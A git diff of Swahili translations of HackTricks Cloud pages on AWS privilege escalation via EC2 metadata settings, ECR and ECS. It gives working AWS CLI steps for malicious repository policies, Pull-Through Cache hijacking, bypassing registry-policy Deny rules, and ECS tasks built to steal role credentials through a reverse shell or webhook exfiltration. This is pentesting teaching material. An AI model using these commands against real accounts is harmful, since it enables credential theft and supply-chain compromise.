Mshambulizi mwenye uwezo wa kuita `ec2:ModifyInstanceMetadataOptions` kwenye instance ya EC2 ya mwathiri anaweza kudhoofisha kinga za IMDS kwa kuwezesha IMDSv1 (`HttpTokens=optional`) na kuongeza `HttpPutResponseHopLimit`. Hii inafanya endpoint ya instance metadata kufikiwa kupitia njia za kawaida za SSRF/proxy kutoka kwa programu zinazoendesha kwenye instance. Ikiwa mshambulizi anaweza kusababisha SSRF katika programu kama hiyo, wanaweza kupata credentials za instance profile na kuzipitisha (pivot) nayo.
- Ruhusa zinazohitajika: `ec2:ModifyInstanceMetadataOptions` kwenye instance lengwa (pamoja na uwezo wa kufikia/kuchochea SSRF kwenye mwenyeji).
- Rasilimali lengwa: Instance ya EC2 inayokimbia yenye instance profile iliyounganishwa (IAM role).
- Ruhusa zinazohitajika: `ec2:ModifyInstanceMetadataOptions` kwenye instance lengwa (pamoja na uwezo wa kufikia/kusababisha SSRF kwenye host).
- Rasilimali lengwa: instance ya EC2 inayotumika yenye instance profile iliyounganishwa (IAM role).
Mfano wa amri:
```bash
@@ -297,4 +294,5 @@ aws sts get-caller-identity
aws ec2 modify-instance-metadata-options --instance-id <INSTANCE_ID> \
--http-tokens required --http-put-response-hop-limit 1
```
Athari Inayowezekana: Uibwa wa credentials za instance profile kupitia SSRF, ukisababisha privilege escalation na lateral movement kwa ruhusa za EC2 role.
Athari Inayoweza Kutokea: Wizi wa instance profile credentials kupitia SSRF unaopelekea privilege escalation na lateral movement kwa ruhusa za EC2 role.
{{#include ../../../../banners/hacktricks-training.md}}

74
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc/README.md
View File

@@ -8,19 +8,19 @@
Mshambuliaji mwenye **`ecr:GetAuthorizationToken`** na **`ecr:BatchGetImage`** anaweza kuingia kwenye ECR na kupakua images.
For more info on how to download images:
Kwa taarifa zaidi kuhusu jinsi ya kupakua images:
{{#ref}}
../../aws-post-exploitation/aws-ecr-post-exploitation/README.md
{{#endref}}
**Athari Inayowezekana:** privesc isiyo ya moja kwa moja kwa kukamata taarifa nyeti kwenye trafiki.
**Potential Impact:** Inaweza kusababisha privesc kwa kuingilia kati taarifa nyeti kwenye trafiki.
### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`
Mshambuliaji mwenye ruhusa zote hizo **anaweza kuingia kwenye ECR na kupakia images**. Hii inaweza kusaidia escalate privileges kwa mazingira mengine ambapo images hizo zinatumika.
Mshambuliaji mwenye ruhusa zote hizi **anaweza kuingia kwenye ECR na kupakia images**. Hii inaweza kusaidia kupanua ruhusa kwa mazingira mengine ambapo images hizo zinatumika.
To learn how to upload a new image/update one, check:
Ili kujifunza jinsi ya kupakia image mpya/au kusasisha moja, angalia:
{{#ref}}
../../aws-services/aws-eks-enum.md
@@ -32,8 +32,8 @@ Kama sehemu iliyotangulia, lakini kwa repositories za umma.
### `ecr:SetRepositoryPolicy`
Mshambuliaji mwenye ruhusa hii anaweza **kubadilisha** **sera** ya **repository** ili kujipa (au hata kumpa kila mtu) **ufikiaji wa kusoma/kuandika**.\
Kwa mfano, katika mfano huu ufikiaji wa kusoma umepewa kila mtu.
Mshambuliaji mwenye ruhusa hii anaweza **change** the **repository** **policy** ili kumpa yeye mwenyewe (au hata kila mtu) **read/write access**.\
Kwa mfano, katika mfano huu read access imetolewa kwa kila mtu.
```bash
aws ecr set-repository-policy \
--repository-name <repo_name> \
@@ -59,8 +59,8 @@ Maudhui ya `my-policy.json`:
```
### `ecr-public:SetRepositoryPolicy`
Kama sehemu iliyotangulia, lakini kwa ghala za umma.\
Mvamizi anaweza **kubadilisha sera ya ghala** ya ECR Public repository ili kuruhusu ufikiaji wa umma usioidhinishwa au kupandisha mamlaka yake.
Kama sehemu iliyopita, lakini kwa repositories za umma.\
Mshambuliaji anaweza **kubadilisha sera ya repository** ya ECR Public repository ili kutoa ufikaji wa umma usioidhinishwa au kuongeza vibali vyao.
```bash
# Create a JSON file with the malicious public repository policy
echo '{
@@ -87,58 +87,52 @@ echo '{
# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
```
**Madhara Yanayoweza Kutokea**: Ufikiaji wa umma usioidhinishwa kwa repositori ya ECR Public, ukiruhusu mtumiaji yeyote push, pull, au delete images.
**Athari Inayowezekana**: Ufikiaji wa umma usioidhinishwa kwa ECR Public repository, ukimruhusu mtumiaji yeyote push, pull, au delete images.
### `ecr:PutRegistryPolicy`
Mshambuliaji mwenye ruhusa hii anaweza **kubadilisha** **sera ya rejista** ili kujipa yeye mwenyewe, akaunti yake (au hata kila mtu) **read/write access**.
Mdukuzi mwenye ruhusa hii anaweza **kubadilisha** **sera ya rejista** ili kujipa yeye mwenyewe, akaunti yake (au hata kila mtu) **ufikiaji wa kusoma/kuandika**.
```bash
aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
```
{{#include ../../../../banners/hacktricks-training.md}}
### ecr:CreatePullThroughCacheRule
Tumia mbaya kanuni za ECR Pull Through Cache (PTC) kuoanisha namespace ya upstream inayodhibitiwa na attacker na prefix ya private ECR inayotambulika. Hii inasababisha workloads zinazovuta kutoka private ECR kupokea kwa uwazi attacker images bila push yoyote kwenye private ECR.
Tumia vibaya sheria za ECR Pull Through Cache (PTC) kuoanisha upstream namespace inayodhibitiwa na mshambuliaji na prefix ya private ECR inayotambulika. Hii inafanya workloads zinazovuta kutoka private ECR kupokea picha za mshambuliaji kwa uwazi bila push yoyote kwenye private ECR.
- Idhini zinazohitajika: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. Ikiwa unatumia ECR Public upstream: ecr-public:* ili kuunda/pusha kwenye repo ya umma.
- Imethibitishwa upstream: public.ecr.aws
- Ruhusa zinazohitajika: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule. Ikiwa unatumia ECR Public kama upstream: ecr-public:* ili kuunda/ku-push kwenye public repo.
- Upstream iliyojaribiwa: public.ecr.aws
Hatua (mfano):
1. Tayarisha attacker image katika ECR Public
1. Prepare attacker image in ECR Public
# Get your ECR Public alias with: aws ecr-public describe-registries --region us-east-1
docker login public.ecr.aws/<public_alias>
docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test .
docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test
2. Unda kanuni ya PTC kwenye private ECR ili kuoanisha prefix ya kuaminika na public registry
2. Create the PTC rule in private ECR to map a trusted prefix to the public registry
aws ecr create-pull-through-cache-rule --region us-east-2 --ecr-repository-prefix ptc --upstream-registry-url public.ecr.aws
3. Vuta attacker image kupitia njia ya private ECR (hakukuwa na push kwenda private ECR)
3. Pull the attacker image via the private ECR path (no push to private ECR was done)
docker login <account_id>.dkr.ecr.us-east-2.amazonaws.com
docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
docker run --rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test
Potential Impact: Kuvuruga mnyororo wa usambazaji kwa kupora majina ya ndani ya image chini ya prefix iliyochaguliwa. Workload yoyote inayovuta images kutoka private ECR ikitumia prefix hiyo itapokea maudhui yanayodhibitiwa na attacker.
Potential Impact: Uharibifu wa mnyororo wa ugavi kwa kuiba majina ya ndani ya image chini ya prefix uliyochaguliwa. Workload yoyote inayovuta images kutoka private ECR kwa kutumia prefix hiyo itapokea maudhui yanayotawaliwa na mshambuliaji.
### `ecr:PutImageTagMutability`
Tumia mbaya ruhusa hii kubadilisha repo yenye tag immutability kuwa mutable na kuandika upya tags za kuaminika (mfano, latest, stable, prod) na maudhui yanayodhibitiwa na attacker.
Tumia vibaya ruhusa hii kubadilisha repository yenye tag immutability kuwa mutable na kuandika juu ya tags zinazotegemewa (mf., latest, stable, prod) na maudhui yanayotawaliwa na mshambuliaji.
- Idhini zinazohitajika: `ecr:PutImageTagMutability` pamoja na uwezo wa push (`ecr:GetAuthorizationToken`, `ecr:InitiateLayerUpload`, `ecr:UploadLayerPart`, `ecr:CompleteLayerUpload`, `ecr:PutImage`).
- Athari: Kuvuruga supply-chain kwa kubadilisha kimya kimya immutable tags bila kubadilisha majina ya tag.
- Ruhusa zinazohitajika: `ecr:PutImageTagMutability` pamoja na uwezo wa ku-push (`ecr:GetAuthorizationToken`, `ecr:InitiateLayerUpload`, `ecr:UploadLayerPart`, `ecr:CompleteLayerUpload`, `ecr:PutImage`).
- Athari: Uharibifu wa mnyororo wa ugavi kwa kimya kwa kuchukua nafasi tags zisizobadilika bila kubadilisha majina ya tag.
Hatua (mfano):
<details>
<summary>Poison an immutable tag by toggling mutability</summary>
<summary>Kuathiri tag isiyobadilika kwa kubadilisha mutability</summary>
```bash
REGION=us-east-1
REPO=ht-immutable-demo-$RANDOM
@@ -158,17 +152,17 @@ docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod
</details>
#### Uvamizi wa rejista ya kimataifa kupitia sheria ya ROOT Pull-Through Cache
#### Utekaji wa rejista ya kimataifa kupitia ROOT Pull-Through Cache rule
Tengeneza sheria ya Pull-Through Cache (PTC) ukitumia `ecrRepositoryPrefix=ROOT` maalum ili kuoanisha mzizi wa rejista ya ECR ya kibinafsi na rejista ya umma ya juu (mfano, ECR Public). Kila pull kwa repository isiyopo kwenye rejista ya kibinafsi itatumikishwa kwa uwazi kutoka upstream, ikiruhusu kuvamia mnyororo wa usambazaji bila kutuma (push) kwenye ECR ya kibinafsi.
Unda Pull-Through Cache (PTC) rule ukitumia maalum `ecrRepositoryPrefix=ROOT` ili kuoanisha mzizi wa rejista ya ECR ya kibinafsi na rejista ya umma ya upstream (mfano, ECR Public). Kuvuta yoyote kwa repository isiyokuwepo kwenye rejista ya kibinafsi kutahudumiwa kwa uwazi kutoka upstream, kuruhusu supply-chain hijacking bila kuipakia kwenye ECR binafsi.
- Ruhusa zinazohitajika: `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`, `ecr:GetAuthorizationToken`.
- Athari: Pulls kwa `<account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag>` yatafanikiwa na yataunda moja kwa moja repos za kibinafsi zenye chanzo kutoka upstream.
- Idhini zinazohitajika: `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`, `ecr:GetAuthorizationToken`.
- Athari: Kuvuta kwenye `<account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag>` kutafanikiwa na yataunda repos binafsi kiotomatiki zikichukuliwa kutoka upstream.
> Kumbuka: Kwa sheria za `ROOT`, toa `--upstream-repository-prefix`. Kutoa itasababisha kosa la uthibitishaji.
> Kumbuka: Kwa `ROOT` rules, acha `--upstream-repository-prefix`. Kutoa thamani yake kutaashiria kosa la uthibitisho.
<details>
<summary>Onyesho (us-east-1, upstream public.ecr.aws)</summary>
<summary>Demo (us-east-1, upstream public.ecr.aws)</summary>
```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)
@@ -197,17 +191,17 @@ aws ecr delete-repository --region "$REGION" --repository-name docker/library/al
```
</details>
### `ecr:PutAccountSetting` (Shusha `REGISTRY_POLICY_SCOPE` ili kupitisha vikwazo vya registry policy)
### `ecr:PutAccountSetting` (Shusha `REGISTRY_POLICY_SCOPE` to bypass registry policy denies)
Tumia vibaya `ecr:PutAccountSetting` kubadili wigo wa sera ya rejista kutoka `V2` (sera inayotumika kwa vitendo vyote vya ECR) hadi `V1` (sera inayotumika tu kwa `CreateRepository`, `ReplicateImage`, `BatchImportUpstreamImage`). Ikiwa sera ya rejista yenye vikwazo Deny inazuia vitendo kama `CreatePullThroughCacheRule`, kushusha hadi `V1` kunafuta utekelezaji huo ili identitypolicy Allows zichukue nafasi.
Abuse `ecr:PutAccountSetting` ili kubadilisha upeo wa registry policy kutoka `V2` (sera inayotumika kwa vitendo vyote vya ECR) hadi `V1` (sera inayotumika tu kwa `CreateRepository`, `ReplicateImage`, `BatchImportUpstreamImage`). Ikiwa registry policy kali ya Deny inazuia vitendo kama CreatePullThroughCacheRule, kushusha hadi `V1` kunaharibu utekelezaji huo ili identitypolicy Allows zichukue nafasi.
- Required perms: `ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
- Impact: Uwezo wa kufanya vitendo vya ECR ambavyo awali vilizuia na registry policy Deny (mfano, kuunda sheria za PTC) kwa kuweka wigo kwa muda kuwa `V1`.
- Idhini zinazohitajika: `ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
- Athari: Uwezo wa kufanya vitendo vya ECR vilivyokuwa vimezuiliwa hapo awali na registry policy Deny (mfano, kuunda PTC rules) kwa muda kwa kuweka upeo kuwa `V1`.
Steps (example):
Hatua (mfano):
<details>
<summary>Bypass registry policy Deny on CreatePullThroughCacheRule by switching to V1</summary>
<summary>Bypass registry policy Deny kwenye CreatePullThroughCacheRule kwa kubadili kwenda `V1`</summary>
```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)
@@ -266,3 +260,5 @@ fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
```
</details>
{{#include ../../../../banners/hacktricks-training.md}}

149
src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc/README.md
View File

@@ -4,7 +4,7 @@
## ECS
Taarifa zaidi kuhusu **ECS** ziko katika:
Taarifa zaidi kuhusu **ECS** katika:
{{#ref}}
../../aws-services/aws-ecs-enum.md
@@ -12,7 +12,7 @@ Taarifa zaidi kuhusu **ECS** ziko katika:
### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask`
Mshambuliaji anayefaidisha vibaya ruhusa za `iam:PassRole`, `ecs:RegisterTaskDefinition` na `ecs:RunTask` katika ECS anaweza **kuunda task definition mpya** kwa **container hasidi** inayokamata kredensiali za metadata na **kuiendesha**.
Mshambuliaji anayetumia vibaya ruhusa za `iam:PassRole`, `ecs:RegisterTaskDefinition` na `ecs:RunTask` ndani ya ECS anaweza **kutengeneza task definition mpya** yenye **container hatari** ambayo inaiba cheti za metadata na **kuendesha**.
{{#tabs }}
{{#tab name="Reverse Shell" }}
@@ -39,7 +39,7 @@ aws ecs deregister-task-definition --task-definition iam_exfiltration:1
{{#tab name="Webhook" }}
Tengeneza webhook kwa tovuti kama webhook.site
Unda webhook kwa tovuti kama webhook.site
```bash
# Create file container-definition.json
@@ -75,19 +75,19 @@ aws ecs deregister-task-definition --task-definition iam_exfiltration:1
{{#endtabs }}
**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa role tofauti ya ECS.
**Athari Inayowezekana:** Direct privesc kwa ECS role tofauti.
### `iam:PassRole`,`ecs:RunTask`
Mwanasusi ambaye ana ruhusa za `iam:PassRole` na `ecs:RunTask` anaweza kuanzisha task mpya ya ECS na kubadilisha **execution role**, **task role** na thamani za **command** za container. Amri ya CLI `ecs run-task` ina bendera `--overrides` inayoiruhusu kubadilisha kwa wakati wa utekelezaji `executionRoleArn`, `taskRoleArn` na `command` ya container bila kuharibu task definition.
Mshambuliaji mwenye ruhusa za `iam:PassRole` na `ecs:RunTask` anaweza kuanzisha task mpya ya ECS na kubadilisha **execution role**, **task role** pamoja na thamani za container's **command**. Amri ya CLI ya `ecs run-task` ina flag ya `--overrides` ambayo inaruhusu kubadilisha wakati wa utekelezaji `executionRoleArn`, `taskRoleArn` na container's `command` bila kugusa task definition.
IAM roles zilizotajwa kwa `taskRoleArn` na `executionRoleArn` lazima ziwe zimekubali/kuruhusu kuchukuliwa na `ecs-tasks.amazonaws.com` katika trust policy yao.
Roles za IAM zilizobainishwa kwa `taskRoleArn` na `executionRoleArn` zinapaswa kumwamini/kuruhusu `ecs-tasks.amazonaws.com` kuziteuwa katika trust policy yao.
Vilevile, mwanasusi anahitaji kujua:
- jina la cluster ya ECS
- Subnet ya VPC
- Security group (Ikiwa hakuna security group iliyotajwa, ile ya chaguo-msingi itatumika)
- jina la Task Definition na marekebisho
- jina la Container
Aidha, mshambuliaji anahitaji kujua:
- Jina la ECS cluster
- VPC Subnet
- Security group (Ikiwa hakuna security group imetajwa, ile ya default itatumika)
- Task Definition Name na revision
- Jina la Container
```bash
aws ecs run-task \
--cluster <cluster-name> \
@@ -105,9 +105,9 @@ aws ecs run-task \
]
}'
```
Katika kipande cha msimbo hapo juu attacker anabadili thamani ya `taskRoleArn` pekee. Hata hivyo, attacker lazima awe na ruhusa ya `iam:PassRole` kwa `taskRoleArn` iliyotajwa kwenye amri na kwa `executionRoleArn` iliyotajwa katika task definition ili attack ifanikie.
Katika kipande cha msimbo hapo juu mwizi anabadilisha tu thamani ya `taskRoleArn`. Hata hivyo, mwizi lazima awe na ruhusa ya `iam:PassRole` juu ya `taskRoleArn` iliyotajwa katika amri na `executionRoleArn` iliyotajwa katika ufafanuzi wa task ili shambulio lifanyike.
Iwapo IAM role ambayo attacker anaweza kuipasa ina vibali vya kutosha kushusha image kutoka ECR na kuanzisha ECS task (`ecr:BatchCheckLayerAvailability`, `ecr:GetDownloadUrlForLayer`,`ecr:BatchGetImage`,`ecr:GetAuthorizationToken`) basi attacker anaweza kuteua IAM role ile ile kwa `executionRoleArn` na `taskRoleArn` katika amri ya `ecs run-task`.
Iwapo role ya IAM ambayo mwizi anaweza kuipitisha ina haki za kutosha kuvuta image ya ECR na kuanzisha task ya ECS (`ecr:BatchCheckLayerAvailability`, `ecr:GetDownloadUrlForLayer`,`ecr:BatchGetImage`,`ecr:GetAuthorizationToken`) basi mwizi anaweza kubainisha role ile ile ya IAM kwa `executionRoleArn` na `taskRoleArn` katika amri ya `ecs run-task`.
```sh
aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
@@ -121,11 +121,11 @@ aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-config
]
}'
```
**Athari Inayoweza Kutokea:** Direct privesc kwa yoyote ECS task role.
**Athari Inayowezekana:** Direct privesc to any ECS task role.
### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`
Kama ilivyo kwenye mfano uliopita, mshambuliaji akitumia vibaya ruhusa za **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** ndani ya ECS anaweza **kutengeneza task definition mpya** yenye **container yenye madhara** ambayo inapora kredensiali za metadata na **kuendesha**.\
Kama katika mfano uliopita, mshambuliaji anayefaidisha ruhusa za **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:StartTask`** katika ECS anaweza **kuunda task definition mpya** yenye **container yenye madhara** inayopora metadata credentials na **kuendesha**.\
Hata hivyo, katika kesi hii, inahitajika container instance ili kuendesha task definition yenye madhara.
```bash
# Generate task definition with rev shell
@@ -142,11 +142,11 @@ aws ecs start-task --task-definition iam_exfiltration \
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
```
**Athari Inayowezekana:** privesc ya moja kwa moja kwa roli yoyote ya ECS.
**Athari Inayoweza Kutokea:** Privesc ya moja kwa moja kwa role yoyote ya ECS.
### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`
### `iam:PassRole`, `ecs:RegisterTaskDefinition`, (`ecs:UpdateService|ecs:CreateService)`
Kama katika mfano uliopita, mshambulizi anayetumia vibaya ruhusa za **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** au **`ecs:CreateService`** katika ECS anaweza **kuunda task definition mpya** yenye **container hasidi** inayoiiba kredensiali za metadata na **kuikimbiza kwa kuunda service mpya yenye angalau task 1 inayoendesha.**
Kama ilivyo kwenye mfano uliopita, mshambuliaji akitumia vibaya idhini za **`iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:UpdateService`** au **`ecs:CreateService`** katika ECS anaweza **kuunda task definition mpya** yenye **malicious container** inayoiiba metadata credentials na **kuendesha kwa kuunda service mpya yenye angalau task moja inayoendesha.**
```bash
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
@@ -169,11 +169,11 @@ aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>
```
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa role yoyote ya ECS.
**Athari Inayowezekana:** Privesc ya moja kwa moja kwa ECS role yoyote.
### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`
### `iam:PassRole`, (`ecs:UpdateService|ecs:CreateService)`
Kwa kweli, kwa ruhusa hizo pekee inawezekana kutumia overrides kuendesha amri yoyote ndani ya container kwa role yoyote kwa mfano:
Kwa kweli, kwa ruhusa hizo tu inawezekana kutumia overrides ili kutekeleza amri za aina yoyote ndani ya container zikiwa na role yoyote, kwa kitu kama:
```bash
aws ecs run-task \
--task-definition "<task-name>" \
@@ -181,16 +181,16 @@ aws ecs run-task \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
```
**Potential Impact:** Privesc ya moja kwa moja kwa role yoyote ya ECS.
**Potential Impact:** Privesc moja kwa moja kwa ECS role yoyote.
### `ecs:RegisterTaskDefinition`, **`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
Hali hii ni kama zile zilizo hapo awali lakini **bila** ruhusa ya **`iam:PassRole`**.\
Hii bado ni ya kuvutia kwa sababu kama unaweza kuendesha kontena yoyote, hata kama haina role, unaweza **kuendesha kontena yenye ruhusa za juu (privileged) ili kukimbia** hadi node na **kuiba EC2 IAM role** na **role za container nyingine za ECS** zinazoendesha kwenye node.\
Unaweza hata **kulazimisha tasks nyingine ziendeshe ndani ya EC2 instance** uliyofanya compromise ili kuiba vibali vyao (kama ilivyojadiliwa katika [**Privesc to node section**](aws-ecs-post-exploitation/README.md#privesc-to-node)).
Hali hii ni kama zile zilizotangulia lakini **bila** ruhusa ya **`iam:PassRole`**.\
Hii bado ni ya kuvutia kwa sababu ikiwa unaweza kuendesha container chochote, hata ikiwa haina role, unaweza **run a privileged container to escape** hadi node na **steal the EC2 IAM role** pamoja na **the other ECS containers roles** zinazokimbia kwenye node.\
Unaweza hata ku**force other tasks to run inside the EC2 instance** uliouwezesha kuingilia ili kuiba credentials zao (kama ilivyojadiliwa katika [**Privesc to node section**](aws-ecs-post-exploitation/README.md#privesc-to-node)).
> [!WARNING]
> Shambulio hili linawezekana tu ikiwa **ECS cluster inatumia EC2** instances na si Fargate.
> Shambulio hili linawezekana tu ikiwa **ECS cluster is using EC2** instances na sio Fargate.
```bash
printf '[
{
@@ -233,12 +233,12 @@ aws ecs run-task --task-definition iam_exfiltration \
```
### `ecs:ExecuteCommand`, `ecs:DescribeTasks,`**`(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)`**
Mvamizi mwenye **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** anaweza **kutekeleza amri** ndani ya container inayokimbia na exfiltrate IAM role iliyounganishwa nayo (unahitaji ruhusa za describe kwa sababu inahitajika kuendesha `aws ecs execute-command`).\
Hata hivyo, ili kufanya hivyo, container instance inahitaji kuendesha **ExecuteCommand agent** (ambayo kwa chaguo-msingi haipo).
Mshambuliaji aliye na **`ecs:ExecuteCommand`, `ecs:DescribeTasks`** anaweza **kutekeleza amri** ndani ya container inayofanya kazi na kuondoa IAM role iliyoshikamana nayo (unahitaji describe permissions kwa sababu ni lazima kuendesha `aws ecs execute-command`).\
Hata hivyo, ili kufanya hivyo, instance ya container inahitaji kuwa inaendesha **ExecuteCommand agent** (ambayo kwa chaguo-msingi haipo).
Therefore, the attacker cloud try to:
Hivyo, mshambuliaji anaweza kujaribu:
- **Jaribu kutekeleza amri** katika kila container inayokimbia
- **Jaribu kuendesha amri** katika kila container inayofanya kazi
```bash
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
@@ -256,18 +256,18 @@ aws ecs execute-command --interactive \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"
```
- Ikiwa ana **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]`
- Ikiwa ana **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]`
- Ikiwa ana **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]`
- Ikiwa ana **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]`
- Kama ana **`ecs:RunTask`**, endesha task kwa `aws ecs run-task --enable-execute-command [...]`
- Kama ana **`ecs:StartTask`**, endesha task kwa `aws ecs start-task --enable-execute-command [...]`
- Kama ana **`ecs:CreateService`**, unda service kwa `aws ecs create-service --enable-execute-command [...]`
- Kama ana **`ecs:UpdateService`**, sasisha service kwa `aws ecs update-service --enable-execute-command [...]`
Unaweza kupata **mifano ya chaguzi hizo** katika **sehemu za awali za ECS privesc**.
**Athari Inayowezekana:** Privesc to a different role attached to containers.
**Athari Inayoweza Kutokea:** Privesc kwa role tofauti iliyounganishwa na containers.
### `ssm:StartSession`
Angalia kwenye **ssm privesc page** jinsi unavyoweza kutumia kibali hiki kwa **privesc to ECS**:
Angalia katika **ssm privesc page** jinsi unavyoweza kutumia vibaya ruhusa hii ili **privesc kwa ECS**:
{{#ref}}
../aws-ssm-privesc/README.md
@@ -275,7 +275,7 @@ Angalia kwenye **ssm privesc page** jinsi unavyoweza kutumia kibali hiki kwa **p
### `iam:PassRole`, `ec2:RunInstances`
Angalia kwenye **ec2 privesc page** jinsi unavyoweza kutumia vibali hivi kwa **privesc to ECS**:
Angalia katika **ec2 privesc page** jinsi unavyoweza kutumia vibaya ruhusa hizi ili **privesc kwa ECS**:
{{#ref}}
../aws-ec2-privesc/README.md
@@ -283,16 +283,16 @@ Angalia kwenye **ec2 privesc page** jinsi unavyoweza kutumia vibali hivi kwa **p
### `ecs:RegisterContainerInstance`, `ecs:DeregisterContainerInstance`, `ecs:StartTask`, `iam:PassRole`
Mshambulizi mwenye vibali hivi anaweza kusajili EC2 instance katika ECS cluster na kuendesha tasks juu yake. Hii inaweza kumruhusu mshambulizi kutekeleza code yoyote ndani ya muktadha wa tasks za ECS.
Mshambuliaji mwenye ruhusa hizi anaweza kwa uwezekano kusajili EC2 instance katika ECS cluster na kuendesha tasks juu yake. Hii inaweza kumruhusu mshambuliaji kutekeleza msimbo wowote ndani ya muktadha wa tasks za ECS.
- TODO: Je, inawezekana kusajili instance kutoka kwa akaunti tofauti ya AWS ili tasks ziendeshwe chini ya mashine zinazoendeshwa na mshambulizi??
- TODO: Je, inawezekana kusajili instance kutoka kwa akaunti tofauti ya AWS ili tasks ziendeshwe chini ya mashine zinazosimamiwa na mshambuliaji??
### `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, `ecs:DescribeTaskSets`
> [!NOTE]
> TODO: Test this
> TODO: Jaribu hili
Mshambulizi mwenye vibali `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, and `ecs:DescribeTaskSets` anaweza **kutengeneza malicious task set kwa huduma ya ECS iliyopo na kusasisha primary task set**. Hii inamruhusu mshambulizi **kutekeleza code yoyote ndani ya huduma**.
Mshambuliaji mwenye ruhusa `ecs:CreateTaskSet`, `ecs:UpdateServicePrimaryTaskSet`, na `ecs:DescribeTaskSets` anaweza **kuunda malicious task set kwa service ya ECS iliyopo na kusasisha primary task set**. Hii inamruhusu mshambuliaji **kutekeleza msimbo wowote ndani ya service**.
```bash
# Register a task definition with a reverse shell
echo '{
@@ -318,21 +318,21 @@ aws ecs create-task-set --cluster existing-cluster --service existing-service --
# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
```
**Athari Inayowezekana**: Tekeleza msimbo wowote katika huduma iliyoathiriwa, jambo ambalo linaweza kuathiri utendaji wake au kusafirisha nje data nyeti.
**Athari Inayowezekana**: Tekeleza msimbo wowote katika huduma iliyoharibiwa, jambo linaloweza kuathiri utendaji wake au kuondoa data nyeti kwa siri.
## References
## Marejeo
- [https://ruse.tech/blogs/ecs-attack-methods](https://ruse.tech/blogs/ecs-attack-methods)
{{#include ../../../../banners/hacktricks-training.md}}
### Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
Mshambulizi mwenye ruhusa za kusimamia ECS capacity providers na kusasisha services anaweza kuunda EC2 Auto Scaling Group anayezisimamia, kuiweka ndani ya ECS Capacity Provider, kuiunganisha na cluster ya lengo, na kuhamisha huduma ya mhanga ili itumie provider hii. Kisha tasks zitapangwa kwenye EC2 instances zinazosimamiwa na mshambulizi, zikiruhusu ufikiaji wa ngazi ya OS kwa ajili ya kukagua containers na kuiba task role credentials.
